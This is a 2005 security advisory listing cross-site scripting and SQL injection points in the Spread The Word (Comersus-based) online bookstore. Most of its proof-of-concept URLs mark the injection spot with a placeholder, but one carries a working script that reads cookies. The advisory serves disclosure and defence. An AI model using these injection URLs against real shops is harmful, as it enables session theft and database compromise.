Spread The Word multiple XSS and SQL injections

Tuesday, May 24, 2005
####################################################
Spread The Word (comersus based bookstore ) multiple
script and variables XSS and SQL Injections vulnerabilities.
vendor url:http://www.stwm.com/opportunity.asp
advisore url:http://lostmon.blogspot.com/2005/05/
spread-word-multiple-xss-and-sql.html
vendor notified:yes exploit available: yes
BID:13733 and 13737
####################################################

Spread The Word (comersus based bookstore ) contains a flaw that
allows a remote cross site scripting attack.This flaw exists because
the application does not validate multiple variables upon submission
to multiple scripts.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.


##############
versions:
##############

I can´t established what version are affected.

##############
solution:
##############

no solution was available at this time.

##############
timeline
##############

discovered: 17 oct 2004
vendor notify: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005



####################
proof of concepts:
####################

Some files have diferent prefix like STW
ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp'

#####################
BrowseCategories.asp
#####################

XSS,sql errors and path disclosure.


http://[target]/store/BrowseCategories.asp?Cat0=783&
Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]

http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=
Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible

Cat0literal can be books, videos,gifts,bibles,or other categories similars listed in the cart.

#############
search.asp
#############

XSS,sql errors and path disclosure.

http://[target]/store/Search.asp?SearchType=565
[SQL-INJECTION]&strSearch=lalala

http://[target]/store/Search.asp?InStock=[XSS-here]
&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=
783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1
&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&
PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
[XSS-here]&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=[XSS-here]&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=&PublicationDate='

##################
AdvancedSearch.asp
##################

http://[target]/store/AdvancedSearch.asp?strSearch=
[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=
-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=
111111111&B1=Submit


##################
ViewItem.asp
##################

XSS,sql errors and path disclosure.

http://[target]/store/ViewItem.asp?ISBN=
0789906651[XSS-here]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=
0789906651&Cat0=565[XSS-here]

http://[target]/store/ViewItem.asp?ISBN=
0789906651[SQL-INJECTION]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=0789906651
&Cat0=565[SQL-INJECTION]



####################
STWShowContent.asp
###################
XSS ,sql errors and path disclosure.


http://[target]/store/STWShowContent.asp?
idRightPage=13032[XSS-CODE]

http://[target]/store/STWShowContent.asp?
idRightPage=13032[SQL-INJECTION]

http://[target]/store/STWShowContent.asp

###################
MySide.Asp
###################
XSS,sql errors and path disclosure.


http://[target]/store/MySide.Asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]

http://[target]/store/MySide.Asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles

#################
BrowseMain.asp
#################
XSS ,sql errors and path disclosure.

http://[target]/store/BrowseMain.asp?Cat0=565
[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=783
&Cat0Literal=Gifts&CurHigh=3"><
script>alert(document.cookie)</script>

################
others
################
XSS

http://[target]/store/NewCustomer.asp?newemail=
zzzz@lalala.es&RedirectURL=[XSS-CODE]

http://[target]/store/Login.asp?RedirectURL=[XSS-code]

Also it´s posible to we can inject sql or XSS code in 'Cat0' variable
or 'Cat1' in all files where this variables are used.

Also it´s posible to we can inject XSS code in 'Cat0literal' variable
or 'Cat1literal' in all files where this variables are used.

################### End ################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...